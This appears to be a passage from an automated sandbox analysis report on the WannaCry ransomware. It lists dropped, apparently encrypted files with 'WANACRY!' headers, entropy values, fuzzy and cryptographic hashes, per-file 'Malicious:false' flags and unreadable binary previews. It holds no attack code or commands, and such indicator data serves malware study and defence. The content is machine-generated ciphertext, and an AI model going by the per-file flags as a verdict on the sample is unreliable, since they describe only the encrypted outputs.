                                                                              Preview:WANACRY!......EfS.s..wv'.......#...>b.....;..'0.~....2.#./K.T-`X..{r.....b.`j..w..%.`...a.u....}I.wZ..B.t...B.<..)..L.....txG..(...f,.....7.....F.{.)pZQ...$..g.....BT.....<.K.......m.k.<(..j.c.}.x..u....#!.5...9...!Z...>9.XR.K..._B....{...]f.wu....8.`.....f..............6.....~u..[.I..}.(.5...%.N.X..@.....7.M.F..+..@wg....A.K.J...m....8(2.%f....T7S.d..C...-".F......3...Q.`.+.mK.P....X@g$.7&..........$.j.01.q........R....\.xbiC.p.zz...]:...xl.H.,...i......`q...^......+g.! H.4....$.~L.D.s..inb..#....n.d.j.-..}..\..|......gsJ...3.H.vv.F.a(.,#..{.\:Drx..z;..M.u.jW.V.(k=.>./g....:.T#.<.n..P.(...........^.JQ.IN.&...(.K..T{...W..B.p!zA.y....F.+..^_.."N.h}Q.../6s@&6.4..6.u..=4H.#..}s....~..S]..h.K.......`}Y...)*.....Y.y.Mu.h....9.(.0KI..._`X.e.Y.O.c.k$._.odL...._.r..V.4.....|2..D.......!....|'.1.L..5.Hl..-{.....P...("...u*.31.r.r,.t........*U..H...#.S..j-...>.a.@.ck1./.4H...2_.c..($.....E.w...V~.V......H.Y.#.......X...w~...^..Q.....}...$A.w
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3288
                                                                              Entropy (8bit):7.944996954245027
                                                                              Encrypted:false
                                                                              SSDEEP:96:oI6hv4NrQ8fE2QC2C2OEM/W/hCwGhdo2c:xNBfENZCn1ChCwGhdFc
                                                                              MD5:2D602CE627D6265FF3FB2B8A295DD62B
                                                                              SHA1:82E717E8B2391117DFB2D8FD96A3B300C9C62F01
                                                                              SHA-256:363BCE8510F1B5923C3B7623DD0044FDF4FB2D01868254F02C482A9927EDDB7E
                                                                              SHA-512:E940C2984750FBF0863B311ED5FB3F8BBC401B07459C3017A998C24874C7C3CB6CCE1CAF1E954BD5DB3C731F87C2415F5329FB83D6560CA5AEF1CE4FB00B881F
                                                                              Malicious:false
                                                                              Preview:WANACRY!......EfS.s..wv'.......#...>b.....;..'0.~....2.#./K.T-`X..{r.....b.`j..w..%.`...a.u....}I.wZ..B.t...B.<..)..L.....txG..(...f,.....7.....F.{.)pZQ...$..g.....BT.....<.K.......m.k.<(..j.c.}.x..u....#!.5...9...!Z...>9.XR.K..._B....{...]f.wu....8.`.....f..............6.....~u..[.I..}.(.5...%.N.X..@.....7.M.F..+..@wg....A.K.J...m....8(2.%f....T7S.d..C...-".F......3...Q.`.+.mK.P....X@g$.7&..........$.j.01.q........R....\.xbiC.p.zz...]:...xl.H.,...i......`q...^......+g.! H.4....$.~L.D.s..inb..#....n.d.j.-..}..\..|......gsJ...3.H.vv.F.a(.,#..{.\:Drx..z;..M.u.jW.V.(k=.>./g....:.T#.<.n..P.(...........^.JQ.IN.&...(.K..T{...W..B.p!zA.y....F.+..^_.."N.h}Q.../6s@&6.4..6.u..=4H.#..}s....~..S]..h.K.......`}Y...)*.....Y.y.Mu.h....9.(.0KI..._`X.e.Y.O.c.k$._.odL...._.r..V.4.....|2..D.......!....|'.1.L..5.Hl..-{.....P...("...u*.31.r.r,.t........*U..H...#.S..j-...>.a.@.ck1./.4H...2_.c..($.....E.w...V~.V......H.Y.#.......X...w~...^..Q.....}...$A.w
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4136
                                                                              Entropy (8bit):7.95187932445891
                                                                              Encrypted:false
                                                                              SSDEEP:96:oeYJ9rvwye8VnwNYnmOZ+CSC4jCvyp8VMZt3dB9jRAH7:krrvwpGw7oCj2ySVMZttB99AH7
                                                                              MD5:4045EF8AF4E1BACEEF764514C48FC257
                                                                              SHA1:A21F96D8A87D4EB02D794E7D07CC431E3E85BAA0
                                                                              SHA-256:E94D5E6620B46FD99E82F019BD4692CFA82CEE71F4AE6F443CF867534DDCA22B
                                                                              SHA-512:2E447160212C41A599663E986BC6222172BAE19CC9CE20696942CF3007419D67D7E36F60C82431B17F2F88DC19FFB568BC00DE2115C16B102471250727278F3A
                                                                              Malicious:false
                                                                              Preview:WANACRY!....8x.._BH.....i]UU._*...G%......)......|.1.}\..)P..F,#pd>...^.b..|#...L..AB8U&..j...1_R`q.W..&.....&J.s..8K..5.Z/q.....D.B....B.5.~.wt..b~..U..5D.._@h..N.m...dj#w.H}m.....a..=....:c......@.~.+.......G.t....L/&^.D.'..[E 6$.=..1S..Q4..Y.<.pO...'...D=..................g.`U.|%....[..(#q.!.ID........4...$Y...GY[.....\.......N.._A...........;..'.c[..6K.2...T;.Hv..{...*-.NtT..e........(`.Gt<...E..d..B..H..+..N.fL.....$.......S.2..0..s.W(.y.......z.#.S...vg..f.vC.....G.&f.N.b.n..()..r.:..D.b.....N.9...4...V)P!T.3..a&D..!.8...u.....og.hG..&0.........Vy.F.......HT..0....C....8f...m`....M7.SOM.....&t.l]E!$..$.'..:..EQik.h...t..V.Y....N.w...G$}..D...k.@..HD./w..8DB..`Ix]5'.i....F*a...[z...!..........%vr.....>oY....o...).~@_.............d..Pl...d..{....4....5..#.M.....9.BkS...D.b....TW.......g....u....b....-....K......m..>+.r....tTP..`.......... ...w....\.j...u...*....p.......+J{.."..NJ.;...T\4.-..(....M..}..!...w[(Yy.=..8>f.J.>Z.......g.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4136
                                                                              Entropy (8bit):7.95187932445891
                                                                              Encrypted:false
                                                                              SSDEEP:96:oeYJ9rvwye8VnwNYnmOZ+CSC4jCvyp8VMZt3dB9jRAH7:krrvwpGw7oCj2ySVMZttB99AH7
                                                                              MD5:4045EF8AF4E1BACEEF764514C48FC257
                                                                              SHA1:A21F96D8A87D4EB02D794E7D07CC431E3E85BAA0
                                                                              SHA-256:E94D5E6620B46FD99E82F019BD4692CFA82CEE71F4AE6F443CF867534DDCA22B
                                                                              SHA-512:2E447160212C41A599663E986BC6222172BAE19CC9CE20696942CF3007419D67D7E36F60C82431B17F2F88DC19FFB568BC00DE2115C16B102471250727278F3A
                                                                              Malicious:false
                                                                              Preview:WANACRY!....8x.._BH.....i]UU._*...G%......)......|.1.}\..)P..F,#pd>...^.b..|#...L..AB8U&..j...1_R`q.W..&.....&J.s..8K..5.Z/q.....D.B....B.5.~.wt..b~..U..5D.._@h..N.m...dj#w.H}m.....a..=....:c......@.~.+.......G.t....L/&^.D.'..[E 6$.=..1S..Q4..Y.<.pO...'...D=..................g.`U.|%....[..(#q.!.ID........4...$Y...GY[.....\.......N.._A...........;..'.c[..6K.2...T;.Hv..{...*-.NtT..e........(`.Gt<...E..d..B..H..+..N.fL.....$.......S.2..0..s.W(.y.......z.#.S...vg..f.vC.....G.&f.N.b.n..()..r.:..D.b.....N.9...4...V)P!T.3..a&D..!.8...u.....og.hG..&0.........Vy.F.......HT..0....C....8f...m`....M7.SOM.....&t.l]E!$..$.'..:..EQik.h...t..V.Y....N.w...G$}..D...k.@..HD./w..8DB..`Ix]5'.i....F*a...[z...!..........%vr.....>oY....o...).~@_.............d..Pl...d..{....4....5..#.M.....9.BkS...D.b....TW.......g....u....b....-....K......m..>+.r....tTP..`.......... ...w....\.j...u...*....p.......+J{.."..NJ.;...T\4.-..(....M..}..!...w[(Yy.=..8>f.J.>Z.......g.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2216
                                                                              Entropy (8bit):7.9050812885256
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkiUJPyMsELI88k/SRfz7ObAhohiWMgQTDrkaQ1aTAGrR0l:oi8aMy+/StHEAWhiWRkDJQcU5
                                                                              MD5:897940B35E7841D9FB4BBF493C66114A
                                                                              SHA1:00C00E3EA28998723E8A9A84EF7CF4507BDFA755
                                                                              SHA-256:AC9EF9CA9C47DE4CDC8655A54C86EE6BD105040EF47234A4148EA6333C16539C
                                                                              SHA-512:B921A296540860E38C25786AA5E5EB6BB2B1118B32131761E4EC48CD6374B37C0DD2C9C6DDF2E3CC4C94EB42927D039B1E2C9CEEC986E01748DC31DBA86567EE
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......X.9.u.\c...2.V..2..............\J..U.#2...X".......{.L......Y)q.FI].|E.#....w.q.h).G....p......z.Uwg5+...*......F@w.5.iA...P.r>....g...k....0....s+.~...........(..=..)e ".Ku................ps*....=..P.....u..}...?.l.B.<.t.9...;..-H.G..-.4s"............p....<}..v....s.%~...|p.....&\..+.=.w*p..K...B...q.yL.......xR....5.S...4<.x............A.k.......QJ...n.gNqG<.p.m.........]..I.}.1V.E..2.h&Z>.{....M.?.:..9U.C.)........xk.....p.....No.yI.................d....G....T...E...y"...V.....0.y;..%..J.ba8.0....6..o...b,.L1..i?s.....`S){.j-...0.....u....$..rc.:AZL<QO..Z...#......I.;.. .j@c.n..Q>.....a..L.N.A.......$.(....2..K.....S.9.....H...Q.......I..M.&..FW=wc...E......D.w{h.4.c...Y.).C]P.......`...|d...l....Ra.."....G..?.T.#...9.....]I_.s..3..C..f...2'.......... .oJ.;m.48.t...hR..DZ...CX....8.......p..L6....*...:`....q.....R.......&C.c..{r.d........u*......p...xD.<E...3..-.;..*.<bu.......J4.,.!..} ...I.....;i.mY..N.....x$.7.~.:
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2216
                                                                              Entropy (8bit):7.9050812885256
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkiUJPyMsELI88k/SRfz7ObAhohiWMgQTDrkaQ1aTAGrR0l:oi8aMy+/StHEAWhiWRkDJQcU5
                                                                              MD5:897940B35E7841D9FB4BBF493C66114A
                                                                              SHA1:00C00E3EA28998723E8A9A84EF7CF4507BDFA755
                                                                              SHA-256:AC9EF9CA9C47DE4CDC8655A54C86EE6BD105040EF47234A4148EA6333C16539C
                                                                              SHA-512:B921A296540860E38C25786AA5E5EB6BB2B1118B32131761E4EC48CD6374B37C0DD2C9C6DDF2E3CC4C94EB42927D039B1E2C9CEEC986E01748DC31DBA86567EE
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......X.9.u.\c...2.V..2..............\J..U.#2...X".......{.L......Y)q.FI].|E.#....w.q.h).G....p......z.Uwg5+...*......F@w.5.iA...P.r>....g...k....0....s+.~...........(..=..)e ".Ku................ps*....=..P.....u..}...?.l.B.<.t.9...;..-H.G..-.4s"............p....<}..v....s.%~...|p.....&\..+.=.w*p..K...B...q.yL.......xR....5.S...4<.x............A.k.......QJ...n.gNqG<.p.m.........]..I.}.1V.E..2.h&Z>.{....M.?.:..9U.C.)........xk.....p.....No.yI.................d....G....T...E...y"...V.....0.y;..%..J.ba8.0....6..o...b,.L1..i?s.....`S){.j-...0.....u....$..rc.:AZL<QO..Z...#......I.;.. .j@c.n..Q>.....a..L.N.A.......$.(....2..K.....S.9.....H...Q.......I..M.&..FW=wc...E......D.w{h.4.c...Y.).C]P.......`...|d...l....Ra.."....G..?.T.#...9.....]I_.s..3..C..f...2'.......... .oJ.;m.48.t...hR..DZ...CX....8.......p..L6....*...:`....q.....R.......&C.c..{r.d........u*......p...xD.<E...3..-.;..*.<bu.......J4.,.!..} ...I.....;i.mY..N.....x$.7.~.:
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1496
                                                                              Entropy (8bit):7.867826041843607
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkbTFkZFb0Vy0IYO8F+OfA2mpjHTbyyUh8gtYcZcnG2ZCf0/3W4NM+XJWfjTwZra:bknFkDAlIqpfA2wj3Bm3cnGQCiHY7TwU
                                                                              MD5:23B5FC1635616EE80DAD6EB79A09D52E
                                                                              SHA1:384A7B238494AABC55088237D9105ED4F7C60D4F
                                                                              SHA-256:EC6DAAB40CEE270C492D1209B32E5F9E6FF88D90ADD02DB50C4C0217506AA91F
                                                                              SHA-512:8B4B0CDE309B7E17B1694F5565AE0162CEC9D6BC1AE7D338DE3E4160ACFF49D7572184C50FB7A1655B17E59604E5442061BA05F3CB3D5EFDE800AA624B1C3C21
                                                                              Malicious:false
                                                                              Preview:WANACRY!....J-...i.6..J..m...s~......Mv...(=.lZ....6.pq...x9...L..v......n.p#...+.r...v.....q...i......g...|V.;........'.......*....l. 3R.......N.A|....RC.J./.3.a..uD.'........~.....0PZ.r<tz'...g..d3%}D..... H._6.........X.7.x.2M....[.4._F.....;..F..............+..`Z&....5..X4..=.....4d.a..u..".C..Y......8B.-.-8.v.....9H&...n.U.......}~...=..8./%.. ._.....o[......m......=.......i...n.&.m...9..8.hw....{c.zL...Y.}.?..|.C.YLa+...P.|!;....>*..fd...c1..5.2i`.......!..J.e....E....>...!.| .{....f.\17.l_.^..I...J..~..Ly<\3.8f...............;.7d..j..C....!B...[.E./..o..S$.F ..x%..<".r>F.J..)5...6.)W.P......te..E..~.m...X:Q.._1nG.j.2../.1..o~U..0.$.|>a.u...2..8...8./.....h...x....4.. .lc.h5...9tI.. 55.N..C.%5......+@:+L;'.KCA.-/2,nQ'....8.KT..Y..9......k.....a.v-E.....B..Y.$..k..y.N.?...l)D.0..r.I6FMJ[.G...A.XXLoQ..kk...F.g5a......c.z..c..hm..u...W4..?!...i.*\q'v..|`0D.li..f.......7Aq.j......[|..I...m.FV..v{.....[.I].7?Vt..~..9.....-.z.?....n.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1496
                                                                              Entropy (8bit):7.867826041843607
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkbTFkZFb0Vy0IYO8F+OfA2mpjHTbyyUh8gtYcZcnG2ZCf0/3W4NM+XJWfjTwZra:bknFkDAlIqpfA2wj3Bm3cnGQCiHY7TwU
                                                                              MD5:23B5FC1635616EE80DAD6EB79A09D52E
                                                                              SHA1:384A7B238494AABC55088237D9105ED4F7C60D4F
                                                                              SHA-256:EC6DAAB40CEE270C492D1209B32E5F9E6FF88D90ADD02DB50C4C0217506AA91F
                                                                              SHA-512:8B4B0CDE309B7E17B1694F5565AE0162CEC9D6BC1AE7D338DE3E4160ACFF49D7572184C50FB7A1655B17E59604E5442061BA05F3CB3D5EFDE800AA624B1C3C21
                                                                              Malicious:false
                                                                              Preview:WANACRY!....J-...i.6..J..m...s~......Mv...(=.lZ....6.pq...x9...L..v......n.p#...+.r...v.....q...i......g...|V.;........'.......*....l. 3R.......N.A|....RC.J./.3.a..uD.'........~.....0PZ.r<tz'...g..d3%}D..... H._6.........X.7.x.2M....[.4._F.....;..F..............+..`Z&....5..X4..=.....4d.a..u..".C..Y......8B.-.-8.v.....9H&...n.U.......}~...=..8./%.. ._.....o[......m......=.......i...n.&.m...9..8.hw....{c.zL...Y.}.?..|.C.YLa+...P.|!;....>*..fd...c1..5.2i`.......!..J.e....E....>...!.| .{....f.\17.l_.^..I...J..~..Ly<\3.8f...............;.7d..j..C....!B...[.E./..o..S$.F ..x%..<".r>F.J..)5...6.)W.P......te..E..~.m...X:Q.._1nG.j.2../.1..o~U..0.$.|>a.u...2..8...8./.....h...x....4.. .lc.h5...9tI.. 55.N..C.%5......+@:+L;'.KCA.-/2,nQ'....8.KT..Y..9......k.....a.v-E.....B..Y.$..k..y.N.?...l)D.0..r.I6FMJ[.G...A.XXLoQ..kk...F.g5a......c.z..c..hm..u...W4..?!...i.*\q'v..|`0D.li..f.......7Aq.j......[|..I...m.FV..v{.....[.I].7?Vt..~..9.....-.z.?....n.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4328
                                                                              Entropy (8bit):7.953630779729808
                                                                              Encrypted:false
                                                                              SSDEEP:96:oz0DyQfpKgVOtGddO5gH0tea6qtVEY8D+RV94JJGUCXNsGNIzDz:Z8CaG65gH+/FMHD+RgJJGUCXNGzDz
                                                                              MD5:52D5F2CD9B34C31C4EFCAB8F6814ECFC
                                                                              SHA1:58A28C4B0D36D5A6C31BB306A839AE715FB5D62C
                                                                              SHA-256:D4C8BB48CC3F67E52B7D219581515141E8B5B5307222D43D3B2EB6C90C3E3872
                                                                              SHA-512:96BDC503580F8FFDC4250035A30627774AAD0F40E0F5E107852D3CF997317FF6B1D991BF3B50932C339CDADD488A638937D5C67C9B5A77BDD8B16CC4EE36C877
                                                                              Malicious:false
                                                                              Preview:WANACRY!....../.A......b...b6.'...,...m..<.l..Sk.i.r............3%.Y...A...x...g.Q.....}.*_..j.....J..Tg...7.Se"|.T]F.43.G..r.q..7..m_......&...j..)..x...S,h...,..T_.W.C........H..I....SgD....$.j.V.?.IRPk.>..B..Q.\;..h.!...|d@.....(.E.... .\......Q..H.................I_......SL..T.T..Z....%I .-M.+\O.......F......2....R..`....j)..}#>.......>.G...y?..G_!.=%.....C|..>.5/....8...=.........r.......3Z..u@.b...Dr...&.X...5.B...t....X.....aO@.RC[I[JN.R0^.Z.......>.......j.C$....|....Y....Bq.....C..'t.o.....)p..|^..,NT1.M.."D..v98'ZL.6.g.b..w.]K../V...(<,....-.).*U.d.... ..&W..R.. ......aC.........H.....6zr.M'.}...[...P.[..%..#....>....H..?.....n|....."..\T....n"..X.U. .oO....2G.Ts......T.?....H"^<.@.X].v..5}....2....P.f|9..E.."f.e...Y.vR...?....>.2\.!....p....z '....J.....G.haO.`.I....~y............a..w2ww.....G._..<.........tC.|._.......<...........@.zL...&.i..IX..._..K|........... 4..h...........~4..z.a.VSK........6.%...H}.qI..1.&..8h
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4328
                                                                              Entropy (8bit):7.953630779729808
                                                                              Encrypted:false
                                                                              SSDEEP:96:oz0DyQfpKgVOtGddO5gH0tea6qtVEY8D+RV94JJGUCXNsGNIzDz:Z8CaG65gH+/FMHD+RgJJGUCXNGzDz
                                                                              MD5:52D5F2CD9B34C31C4EFCAB8F6814ECFC
                                                                              SHA1:58A28C4B0D36D5A6C31BB306A839AE715FB5D62C
                                                                              SHA-256:D4C8BB48CC3F67E52B7D219581515141E8B5B5307222D43D3B2EB6C90C3E3872
                                                                              SHA-512:96BDC503580F8FFDC4250035A30627774AAD0F40E0F5E107852D3CF997317FF6B1D991BF3B50932C339CDADD488A638937D5C67C9B5A77BDD8B16CC4EE36C877
                                                                              Malicious:false
                                                                              Preview:WANACRY!....../.A......b...b6.'...,...m..<.l..Sk.i.r............3%.Y...A...x...g.Q.....}.*_..j.....J..Tg...7.Se"|.T]F.43.G..r.q..7..m_......&...j..)..x...S,h...,..T_.W.C........H..I....SgD....$.j.V.?.IRPk.>..B..Q.\;..h.!...|d@.....(.E.... .\......Q..H.................I_......SL..T.T..Z....%I .-M.+\O.......F......2....R..`....j)..}#>.......>.G...y?..G_!.=%.....C|..>.5/....8...=.........r.......3Z..u@.b...Dr...&.X...5.B...t....X.....aO@.RC[I[JN.R0^.Z.......>.......j.C$....|....Y....Bq.....C..'t.o.....)p..|^..,NT1.M.."D..v98'ZL.6.g.b..w.]K../V...(<,....-.).*U.d.... ..&W..R.. ......aC.........H.....6zr.M'.}...[...P.[..%..#....>....H..?.....n|....."..\T....n"..X.U. .oO....2G.Ts......T.?....H"^<.@.X].v..5}....2....P.f|9..E.."f.e...Y.vR...?....>.2\.!....p....z '....J.....G.haO.`.I....~y............a..w2ww.....G._..<.........tC.|._.......<...........@.zL...&.i..IX..._..K|........... 4..h...........~4..z.a.VSK........6.%...H}.qI..1.&..8h
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1176
                                                                              Entropy (8bit):7.83182864478467
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkuN5YLW4DuI164NRDqvon8Tvr+RubQSq9mpBJCkmeGSoaf:bkuNIWs1jDK3+RLSKmp/+baf
                                                                              MD5:1895964CE8ABF56E32E717F0C4DC09CD
                                                                              SHA1:10D7BD0227B44CA19645E459F42C2C73A02FA73D
                                                                              SHA-256:A5AB3EF0F2AEF703DE1A9CA84559D1C7A7D559E505E6BF32E93E302D932B5A1E
                                                                              SHA-512:0A746C0D380BF6617DAD4D5FDE03A81A922366283B9129AB218962BD8F02E5B5EA817418EFC3C8C02AC39BEE7D6EA92460A12DCEF6D22FD24B1A31B630D38BE0
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....1../.x.]......d.?.........)...R.X.\...zB(./.v.>.7i.=.X..k.V..<J%...2H..9k.:w.a..U.(. .t;...z.W..,.+..c...sp^@ ....2I..y!.*..Kv...:.?.D..Q.6 ;.W........=../.p..Z.}...uN_..h....t.~.j..>.kh...|...f ....W..r..[.v.g.....*......]..[Opud..D...H.M.......z.......O......QJ..!(.BF...'....(.s,.g.9M.4..V..dg..L.).......B'..iW..P@.K....Y..e....!M-.......vNE...$..'pQ...4..>..x..j._.S.s.*Z`4...W..7c.....c...c.-..a.4...j 6HK&.V........."DS..E.S......U..3.cP.u......x.:.w......m.M.`Qj.S.(.....-.I..S..F`$M%../....>.v..O.A(..).-..'l.+..t.....Z..!r..Q....[.......bS0u..-.V..G"..,9V..7.d).1.~..c..[......t.NZ*..x.2`.....(..2.a.h..}r4V..S......*.nS...%)....@b.GA...4..f..w.......$.T7.{k.....F.]UM.e...t-j....T$..Sr.q.D..d..#(....T.,..1.=.{bg..s.......C...G.A+....b.I].N&.s......S..+..=)...m.......(.J.t....+.}.J#.$.5...|....v..|......N.....g.s>.a%:.7.`.....-F..D.P....^..k...e9*.E.(...l...^..t..U....X..Q.hY\).`.....p..r?......Yl..R..`...H.j...x...+B../..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1176
                                                                              Entropy (8bit):7.83182864478467
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkuN5YLW4DuI164NRDqvon8Tvr+RubQSq9mpBJCkmeGSoaf:bkuNIWs1jDK3+RLSKmp/+baf
                                                                              MD5:1895964CE8ABF56E32E717F0C4DC09CD
                                                                              SHA1:10D7BD0227B44CA19645E459F42C2C73A02FA73D
                                                                              SHA-256:A5AB3EF0F2AEF703DE1A9CA84559D1C7A7D559E505E6BF32E93E302D932B5A1E
                                                                              SHA-512:0A746C0D380BF6617DAD4D5FDE03A81A922366283B9129AB218962BD8F02E5B5EA817418EFC3C8C02AC39BEE7D6EA92460A12DCEF6D22FD24B1A31B630D38BE0
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....1../.x.]......d.?.........)...R.X.\...zB(./.v.>.7i.=.X..k.V..<J%...2H..9k.:w.a..U.(. .t;...z.W..,.+..c...sp^@ ....2I..y!.*..Kv...:.?.D..Q.6 ;.W........=../.p..Z.}...uN_..h....t.~.j..>.kh...|...f ....W..r..[.v.g.....*......]..[Opud..D...H.M.......z.......O......QJ..!(.BF...'....(.s,.g.9M.4..V..dg..L.).......B'..iW..P@.K....Y..e....!M-.......vNE...$..'pQ...4..>..x..j._.S.s.*Z`4...W..7c.....c...c.-..a.4...j 6HK&.V........."DS..E.S......U..3.cP.u......x.:.w......m.M.`Qj.S.(.....-.I..S..F`$M%../....>.v..O.A(..).-..'l.+..t.....Z..!r..Q....[.......bS0u..-.V..G"..,9V..7.d).1.~..c..[......t.NZ*..x.2`.....(..2.a.h..}r4V..S......*.nS...%)....@b.GA...4..f..w.......$.T7.{k.....F.]UM.e...t-j....T$..Sr.q.D..d..#(....T.,..1.=.{bg..s.......C...G.A+....b.I].N&.s......S..+..=)...m.......(.J.t....+.}.J#.$.5...|....v..|......N.....g.s>.a%:.7.`.....-F..D.P....^..k...e9*.E.(...l...^..t..U....X..Q.hY\).`.....p..r?......Yl..R..`...H.j...x...+B../..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1432
                                                                              Entropy (8bit):7.847387716028408
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk4ziUG+SFJItx2tovJqqvPfjx1lstfXJ/59RkyHB1e3iRReY2B:bkgifJIPFtDx1+tfJ/9kIBOaROB
                                                                              MD5:9E3A4FAB69377BD19B46A584B49C66A6
                                                                              SHA1:A46DFD3240A76A09EAA750F43BA580E433E3D842
                                                                              SHA-256:C86855926F9B34DFE8908A69885F233D19D38CA273B07FCDD8F8DE0B11F47D30
                                                                              SHA-512:B51EAF32FEE0AD2A0EE76EDBD85308EF43C7D63F43414F4226425333A6A4C1275695D122B2D0DBEBAF61B2DC15FF7C6BE40452928B12FC9895F9C35F102E9CE8
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........G...G...?.f....2....\ZU..R|..Q..J.P0.J..L,...w...6.^.#M ....D....w..s.8.0....p.....$..<]..efiwn#./%t....8..7...g$.._.N....6.....&.~.s..p.S...M#.[..M.`M..=q..G..,`..Q.E.)=......P..k..T.f....B.....?F,..,...O.4.9e.......r....`z ........|........4..3..7..`....K.(.i,..sW.!.........'.a.....3.i.9./.V8...:.....^.i(1..j^...WMo..X...c.*.-..n....".ie.....-^..<.f.w..l.. .....7=.....H..!.~.PW.0&./.URR.).........u..?...C..........m..~.4..l.....k"...0.ELmV=.<.-.a..."........hm@..T....)..~.Pq..J.[.$V.fvO.B2.Q..w....-..i...0>.a.R..`..<..1)bF........)=...3?.s.~,.a.0.Ha"....%%...........E.D...E......,)....L..._&mf.....|fH..l.Gg.j......e..ya..#n!..`o.pE..Y.t....>I...B...<.3o..(..}.....jX!...!.w8$.......5..Q:..u.O.....[.!.v*o......V.h....r........@*..P;....'..H.t...q...9..t.|._.F.Z_E`.b..".D..4.$...V..a..P....^ ....d....c.....Ux".....]...o....h..[o.....\2F..P.q\...G-H.!^......(...^..cR(t..r.?.d,...=.LSn..H6c.t...Zy.c...3..-..4ja_.4..:_.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1432
                                                                              Entropy (8bit):7.847387716028408
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk4ziUG+SFJItx2tovJqqvPfjx1lstfXJ/59RkyHB1e3iRReY2B:bkgifJIPFtDx1+tfJ/9kIBOaROB
                                                                              MD5:9E3A4FAB69377BD19B46A584B49C66A6
                                                                              SHA1:A46DFD3240A76A09EAA750F43BA580E433E3D842
                                                                              SHA-256:C86855926F9B34DFE8908A69885F233D19D38CA273B07FCDD8F8DE0B11F47D30
                                                                              SHA-512:B51EAF32FEE0AD2A0EE76EDBD85308EF43C7D63F43414F4226425333A6A4C1275695D122B2D0DBEBAF61B2DC15FF7C6BE40452928B12FC9895F9C35F102E9CE8
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........G...G...?.f....2....\ZU..R|..Q..J.P0.J..L,...w...6.^.#M ....D....w..s.8.0....p.....$..<]..efiwn#./%t....8..7...g$.._.N....6.....&.~.s..p.S...M#.[..M.`M..=q..G..,`..Q.E.)=......P..k..T.f....B.....?F,..,...O.4.9e.......r....`z ........|........4..3..7..`....K.(.i,..sW.!.........'.a.....3.i.9./.V8...:.....^.i(1..j^...WMo..X...c.*.-..n....".ie.....-^..<.f.w..l.. .....7=.....H..!.~.PW.0&./.URR.).........u..?...C..........m..~.4..l.....k"...0.ELmV=.<.-.a..."........hm@..T....)..~.Pq..J.[.$V.fvO.B2.Q..w....-..i...0>.a.R..`..<..1)bF........)=...3?.s.~,.a.0.Ha"....%%...........E.D...E......,)....L..._&mf.....|fH..l.Gg.j......e..ya..#n!..`o.pE..Y.t....>I...B...<.3o..(..}.....jX!...!.w8$.......5..Q:..u.O.....[.!.v*o......V.h....r........@*..P;....'..H.t...q...9..t.|._.F.Z_E`.b..".D..4.$...V..a..P....^ ....d....c.....Ux".....]...o....h..[o.....\2F..P.q\...G-H.!^......(...^..cR(t..r.?.d,...=.LSn..H6c.t...Zy.c...3..-..4ja_.4..:_.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1592
                                                                              Entropy (8bit):7.875576184545488
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkgNP2Yd8X155FN9z9mC+W9eDI66uzBU3QLyc:ogNPYJ9z9ZpmU0yc
                                                                              MD5:A75C7A2C0726E034FD45399AD325F697
                                                                              SHA1:E1F6D7E8D611C75FB77759EC44EA0138B3D3A34F
                                                                              SHA-256:A31875EFD794E62DDD47271990D6BF6E09FC81A1479ED757EB1097143FA0490D
                                                                              SHA-512:9EB03D6B9E1AF6576572E5759B64A7354E9264A281CF77BC9590D338BB0DA3BA45F9EDC40C4AE96CAC3B51AACB1A7C6F6907F3D98EE971F65365F5EC2F1C3C61
                                                                              Malicious:false
